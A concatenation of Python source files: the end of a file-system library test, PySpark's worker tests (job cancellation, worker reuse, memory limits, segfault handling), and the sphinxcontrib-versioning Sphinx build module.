with from_url(".", force_type='file') as fs:
assert isinstance(fs, Local)
with pytest.raises(ValueError):
from_url(".", force_type='hdfs')
with pytest.raises(ValueError):
from_url(".", force_type='s3')
with pytest.raises(ValueError):
from_url(".", force_type='foobar')
with tempfile.TemporaryDirectory() as d:
zipfilename = os.path.join(d, "test.zip")
ZipForTest(zipfilename)
with from_url(zipfilename, force_type='zip') as fs:
assert isinstance(fs, Zip)
# Without forced type, try to open according to the suffix
with from_url(zipfilename) as fs:
assert isinstance(fs, Zip)
with pytest.raises(ValueError):
# In type 'file' is forced, target path should be a
# directory regardless of the suffix
from_url(zipfilename, force_type='file')
testfilename = os.path.join(d, "test.txt")
with open_url(testfilename, 'w') as fp:
fp.write('hello')
with open_url(testfilename, 'r', force_type='file') as fp:
assert 'hello' == fp.read()
with pytest.raises(ValueError):
with open_url(testfilename, 'r', force_type='hdfs'):
pass
with pytest.raises(IsADirectoryError):
with open_url(testfilename, 'r', force_type='zip'):
pass
@parameterized.expand(["s3", "local"])
@mock_s3
def test_seekeable_read(target):
filename = randstring()
content = b'0123456789'
with gen_fs(target) as fs:
with fs.open(filename, 'wb') as fp:
fp.write(content)
print(content)
for i, c in enumerate(content):
with fs.open(filename, 'rb') as fp:
fp.seek(i)
s = fp.read()
print(c, s)
assert c == s[0]
def test_recreate():
with tempfile.TemporaryDirectory() as d:
zipfilename = os.path.join(d, "test.zip")
z = ZipForTest(zipfilename)
barrier = mp.Barrier(1)
with lazify(lambda: from_url(zipfilename)) as f:
with f.open('file', 'rb') as fp:
content = fp.read()
assert content
assert z.content('file') == content
def func():
# accessing the shared container
with f.open('file', 'rb') as fp:
barrier.wait()
assert content == fp.read()
p = mp.Process(target=func)
p.start()
p.join(timeout=1)
assert p.exitcode == 0
|
test_worker.py | # -*- encoding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import tempfile
import threading
import time
import unittest
has_resource_module = True
try:
import resource
except ImportError:
has_resource_module = False
from py4j.protocol import Py4JJavaError
from pyspark import SparkConf, SparkContext
from pyspark.testing.utils import ReusedPySparkTestCase, PySparkTestCase, QuietTest, eventually
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, "w") as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
cnt = 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(" ")
try:
daemon_pid, worker_pid = map(int, data)
except ValueError:
# In case the value is not written yet.
cnt += 1
if cnt == 10:
raise
else:
break
time.sleep(1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise RuntimeError()
rdd = self.sc.parallelize(range(100), 1)
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_non_exception_error(self):
# SPARK-33339: Pyspark application will hang due to non Exception
def raise_system_exit(_):
raise SystemExit()
rdd = self.sc.parallelize(range(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_system_exit))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(range(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.is_alive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
def test_python_exception_non_hanging(self):
# SPARK-21045: exceptions containing non-ascii characters shall not hang PySpark.
try:
def f():
raise RuntimeError("exception with ไธญ and \xd6\xd0")
self.sc.parallelize([1]).map(lambda x: f()).count()
except Py4JJavaError as e:
self.assertRegex(str(e), "exception with ไธญ")
class WorkerReuseTest(PySparkTestCase):
def test_reuse_worker_of_parallelize_range(self):
def check_reuse_worker_of_parallelize_range():
rdd = self.sc.parallelize(range(20), 8)
previous_pids = rdd.map(lambda x: os.getpid()).collect()
current_pids = rdd.map(lambda x: os.getpid()).collect()
for pid in current_pids:
self.assertTrue(pid in previous_pids)
return True
eventually(check_reuse_worker_of_parallelize_range, catch_assertions=True)
@unittest.skipIf(
not has_resource_module or sys.platform != "linux",
"Memory limit feature in Python worker is dependent on "
"Python's 'resource' module on Linux; however, not found or not on Linux.",
)
class WorkerMemoryTest(unittest.TestCase):
def setUp(self):
class_name = self.__class__.__name__
conf = SparkConf().set("spark.executor.pyspark.memory", "2g")
self.sc = SparkContext("local[4]", class_name, conf=conf)
def test_memory_limit(self):
rdd = self.sc.parallelize(range(1), 1)
def getrlimit():
return resource.getrlimit(resource.RLIMIT_AS)
actual = rdd.map(lambda _: getrlimit()).collect()
self.assertTrue(len(actual) == 1)
self.assertTrue(len(actual[0]) == 2)
[(soft_limit, hard_limit)] = actual
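# "spark.executor.pyspark.memory" of 2g should surface as a 2 GiB RLIMIT_AS soft and hard limit in the worker.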
self.assertEqual(soft_limit, 2 * 1024 * 1024 * 1024)
self.assertEqual(hard_limit, 2 * 1024 * 1024 * 1024)
def tearDown(self):
self.sc.stop()
class WorkerSegfaultTest(ReusedPySparkTestCase):
@classmethod
def conf(cls):
_conf = super(WorkerSegfaultTest, cls).conf()
_conf.set("spark.python.worker.faulthandler.enabled", "true")
return _conf
def test_python_segfault(self):
try:
def f():
import ctypes
ctypes.string_at(0)
self.sc.parallelize([1]).map(lambda x: f()).count()
except Py4JJavaError as e:
self.assertRegex(str(e), "Segmentation fault")
@unittest.skipIf(
"COVERAGE_PROCESS_START" in os.environ,
"Flaky with coverage enabled, skipping for now.",
)
class WorkerSegfaultNonDaemonTest(WorkerSegfaultTest):
@classmethod
def conf(cls):
_conf = super(WorkerSegfaultNonDaemonTest, cls).conf()
_conf.set("spark.python.use.daemon", "false")
return _conf
if __name__ == "__main__":
import unittest
from pyspark.tests.test_worker import * # noqa: F401
try:
import xmlrunner # type: ignore[import]
testRunner = xmlrunner.XMLTestRunner(output="target/test-reports", verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
sphinx_.py | """Interface with Sphinx."""
import datetime
import importlib
import logging
import multiprocessing
import os
from pathlib import Path
import sys
from sphinx import locale
from sphinx.cmd.build import build_main
from sphinx.builders.html import StandaloneHTMLBuilder
from sphinx.config import Config as SphinxConfig
from sphinx.errors import SphinxError
from sphinx.jinja2glue import SphinxFileSystemLoader
from sphinx.util.i18n import format_date
from sphinxcontrib.versioning.lib import Config, HandledError, TempDir
from sphinxcontrib.versioning.versions import Versions
SC_VERSIONING_VERSIONS = list() # Updated after forking.
STATIC_DIR = os.path.join(os.path.dirname(__file__), '_static')
class EventHandlers(object):
"""Hold Sphinx event handlers as static or class methods.
:ivar multiprocessing.queues.Queue ABORT_AFTER_READ: Communication channel to parent process.
:ivar bool BANNER_GREATEST_TAG: Banner URLs point to greatest/highest (semver) tag.
:ivar str BANNER_MAIN_VERSION: Banner URLs point to this remote name (from Versions.__getitem__()).
:ivar bool BANNER_RECENT_TAG: Banner URLs point to most recently committed tag.
:ivar str CURRENT_VERSION: Current version being built.
:ivar bool IS_ROOT: Value for context['scv_is_root'].
:ivar bool SHOW_BANNER: Display the banner.
:ivar sphinxcontrib.versioning.versions.Versions VERSIONS: Versions class instance.
"""
ABORT_AFTER_READ = None
BANNER_GREATEST_TAG = False
BANNER_MAIN_VERSION = None
BANNER_RECENT_TAG = False
CURRENT_VERSION = None
IS_ROOT = False
SHOW_BANNER = False
VERSIONS = None
@staticmethod
def builder_inited(app):
"""Update the Sphinx builder.
:param sphinx.application.Sphinx app: Sphinx application object.
"""
# Add this extension's _templates directory to Sphinx.
templates_dir = os.path.join(os.path.dirname(__file__), '_templates')
app.builder.templates.pathchain.insert(0, templates_dir)
app.builder.templates.loaders.insert(0, SphinxFileSystemLoader(templates_dir))
app.builder.templates.templatepathlen += 1
# Add versions.html to sidebar.
if '**' not in app.config.html_sidebars:
app.config.html_sidebars['**'] = ['localtoc.html', 'relations.html', 'sourcelink.html',
'searchbox.html', 'versions.html']
elif 'versions.html' not in app.config.html_sidebars['**']:
app.config.html_sidebars['**'].append('versions.html')
@classmethod
def env_updated(cls, app, env):
"""Abort Sphinx after initializing config and discovering all pages to build.
:param sphinx.application.Sphinx app: Sphinx application object.
:param sphinx.environment.BuildEnvironment env: Sphinx build environment.
"""
if cls.ABORT_AFTER_READ:
config = {n: getattr(app.config, n) for n in (a for a in dir(app.config) if a.startswith('scv_'))}
config['found_docs'] = tuple(str(d) for d in env.found_docs)
config['master_doc'] = str(app.config.master_doc)
cls.ABORT_AFTER_READ.put(config)
sys.exit(0)
@classmethod
def html_page_context(cls, app, pagename, templatename, context, doctree):
"""Update the Jinja2 HTML context, exposes the Versions class instance to it.
:param sphinx.application.Sphinx app: Sphinx application object.
:param str pagename: Name of the page being rendered (without .html or any file extension).
:param str templatename: Page name with .html.
:param dict context: Jinja2 HTML context.
:param docutils.nodes.document doctree: Tree of docutils nodes.
"""
assert templatename or doctree # Unused, for linting.
cls.VERSIONS.context = context
versions = cls.VERSIONS
this_remote = versions[cls.CURRENT_VERSION]
banner_main_remote = versions[cls.BANNER_MAIN_VERSION] if cls.SHOW_BANNER else None
# Update Jinja2 context.
context['bitbucket_version'] = cls.CURRENT_VERSION
context['current_version'] = cls.CURRENT_VERSION
context['github_version'] = cls.CURRENT_VERSION
context['html_theme'] = app.config.html_theme
context['scv_banner_greatest_tag'] = cls.BANNER_GREATEST_TAG
context['scv_banner_main_ref_is_branch'] = banner_main_remote['kind'] == 'heads' if cls.SHOW_BANNER else None
context['scv_banner_main_ref_is_tag'] = banner_main_remote['kind'] == 'tags' if cls.SHOW_BANNER else None
context['scv_banner_main_version'] = banner_main_remote['name'] if cls.SHOW_BANNER else None
context['scv_banner_recent_tag'] = cls.BANNER_RECENT_TAG
context['scv_is_branch'] = this_remote['kind'] == 'heads'
context['scv_is_greatest_tag'] = this_remote == versions.greatest_tag_remote
context['scv_is_recent_branch'] = this_remote == versions.recent_branch_remote
context['scv_is_recent_ref'] = this_remote == versions.recent_remote
context['scv_is_recent_tag'] = this_remote == versions.recent_tag_remote
context['scv_is_root'] = cls.IS_ROOT
context['scv_is_tag'] = this_remote['kind'] == 'tags'
context['scv_show_banner'] = cls.SHOW_BANNER
context['versions'] = versions
context['vhasdoc'] = versions.vhasdoc
context['vpathto'] = versions.vpathto
# Insert banner into body.
if cls.SHOW_BANNER and 'body' in context:
parsed = app.builder.templates.render('banner.html', context)
context['body'] = parsed + context['body']
# Handle overridden css_files.
css_files = context.setdefault('css_files', list())
if '_static/banner.css' not in css_files:
css_files.append('_static/banner.css')
# Handle overridden html_static_path.
if STATIC_DIR not in app.config.html_static_path:
app.config.html_static_path.append(STATIC_DIR)
# Reset last_updated with file's mtime (will be last git commit authored date).
if app.config.html_last_updated_fmt is not None:
file_path = app.env.doc2path(pagename)
if os.path.isfile(file_path):
lufmt = app.config.html_last_updated_fmt or getattr(locale, '_')('%b %d, %Y')
mtime = datetime.datetime.fromtimestamp(os.path.getmtime(file_path))
context['last_updated'] = format_date(lufmt, mtime, language=app.config.language, warn=app.warn)

class ConfigInject(SphinxConfig):
    """Inject this extension into self.extensions. Append after the user's extensions."""

    def __init__(self, *args):
        """Constructor."""
        super(ConfigInject, self).__init__(*args)
        self.extensions.append('sphinxcontrib.versioning.sphinx_')
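
# NOTE: As the comment in _build() below explains, this subclass could not be
# made to work on Python 3.6 / Sphinx 2+; the importlib-based extensions
# override in _build() supersedes it.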

def _build(argv, config, versions, current_name, is_root):
    """Build Sphinx docs via multiprocessing for isolation.

    :param tuple argv: Arguments to pass to Sphinx.
    :param sphinxcontrib.versioning.lib.Config config: Runtime configuration.
    :param sphinxcontrib.versioning.versions.Versions versions: Versions class instance.
    :param str current_name: The ref name of the current version being built.
    :param bool is_root: Is this build in the web root?
    """
    # Patching application.Config with ConfigInject did not work on Python 3.6 / Sphinx 2+;
    # it was replaced with the importlib-based extensions override before build_main below.
    # application.Config = ConfigInject
    if config.show_banner:
        EventHandlers.BANNER_GREATEST_TAG = config.banner_greatest_tag
        EventHandlers.BANNER_MAIN_VERSION = config.banner_main_ref
        EventHandlers.BANNER_RECENT_TAG = config.banner_recent_tag
        EventHandlers.SHOW_BANNER = True
    EventHandlers.CURRENT_VERSION = current_name
    EventHandlers.IS_ROOT = is_root
    EventHandlers.VERSIONS = versions
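    # Flatten every remote into sorted (key, value) pairs for the module-level
    # SC_VERSIONING_VERSIONS list, skipping the volatile 'sha' and 'date' fields.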
    SC_VERSIONING_VERSIONS[:] = [p for r in versions.remotes for p in sorted(r.items()) if p[0] not in ('sha', 'date')]

    if config.verbose > 1:
        argv += ('-v',) * (config.verbose - 1)
    if config.no_colors:
        argv += ('-N',)
    if config.overflow:
        argv += config.overflow

    # Import the extensions variable from the conf.py of the checked-out version of the code.
    # If this extension isn't present, override extensions in the sphinx-build call so it is
    # included along with any other extensions already listed in conf.py.
    spec = importlib.util.spec_from_file_location('conf', Path(argv[0], 'conf.py'))
    _conf = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(_conf)
    extensions = getattr(_conf, 'extensions', [])  # Guard against a conf.py that defines no extensions list.
    if "sphinxcontrib.versioning" not in extensions:
        extensions.append("sphinxcontrib.versioning")
    argv += ("-D", f"extensions={','.join(extensions)}")
    # Kick off sphinx-build.
    result = build_main(argv)
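    # build_main returns a nonzero status on failure; raising here makes the child
    # process exit nonzero so the parent (build/read_config) can detect the failure.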
    if result != 0:
        raise SphinxError

def _read_config(argv, config, current_name, queue):
    """Read the Sphinx config via multiprocessing for isolation.

    :param tuple argv: Arguments to pass to Sphinx.
    :param sphinxcontrib.versioning.lib.Config config: Runtime configuration.
    :param str current_name: The ref name of the current version being built.
    :param multiprocessing.queues.Queue queue: Communication channel to parent process.
    """
    # Patch.
    EventHandlers.ABORT_AFTER_READ = queue

    # Run.
    _build(argv, config, Versions(list()), current_name, False)

def build(source, target, versions, current_name, is_root):
    """Build Sphinx docs for one version. Includes Versions class instance with names/urls in the HTML context.

    :raise HandledError: If sphinx-build fails. Will be logged before raising.

    :param str source: Source directory to pass to sphinx-build.
    :param str target: Destination directory to write documentation to (passed to sphinx-build).
    :param sphinxcontrib.versioning.versions.Versions versions: Versions class instance.
    :param str current_name: The ref name of the current version being built.
    :param bool is_root: Is this build in the web root?
    """
    log = logging.getLogger(__name__)
    argv = (os.path.abspath(source), os.path.abspath(target))
    config = Config.from_context()

    log.debug('Running sphinx-build for %s with args: %s', current_name, str(argv))
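    # Fork a child process per version: Sphinx keeps module-level state between
    # runs, so a fresh interpreter keeps each version's build isolated.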
    child = multiprocessing.Process(target=_build, args=(argv, config, versions, current_name, is_root))
    child.start()
    child.join()  # Block.
    if child.exitcode != 0:
        log.error('sphinx-build failed for branch/tag: %s', current_name)
        raise HandledError

def read_config(source, current_name):
    """Read the Sphinx config for one version.

    :raise HandledError: If sphinx-build fails. Will be logged before raising.

    :param str source: Source directory to pass to sphinx-build.
    :param str current_name: The ref name of the current version being built.

    :return: Specific Sphinx config values.
    :rtype: dict
    """
    log = logging.getLogger(__name__)
    queue = multiprocessing.Queue()
    config = Config.from_context()

    with TempDir() as temp_dir:
        argv = (os.path.abspath(source), os.path.abspath(temp_dir))
        log.debug('Running sphinx-build for config values with args: %s', str(argv))
        child = multiprocessing.Process(target=_read_config, args=(argv, config, current_name, queue))
        child.start()
        child.join()  # Block.
        if child.exitcode != 0:
            log.error('sphinx-build failed for branch/tag while reading config: %s', current_name)
            raise HandledError

    config = queue.get()
    return config
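
# A minimal usage sketch (illustrative only, not part of the original module);
# 'versions' would be a sphinxcontrib.versioning.versions.Versions instance
# built elsewhere from the git remotes:
#
#     config_values = read_config('docs', 'master')  # dict of scv_* values, found_docs, master_doc
#     build('docs', 'html/master', versions, 'master', is_root=True)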
|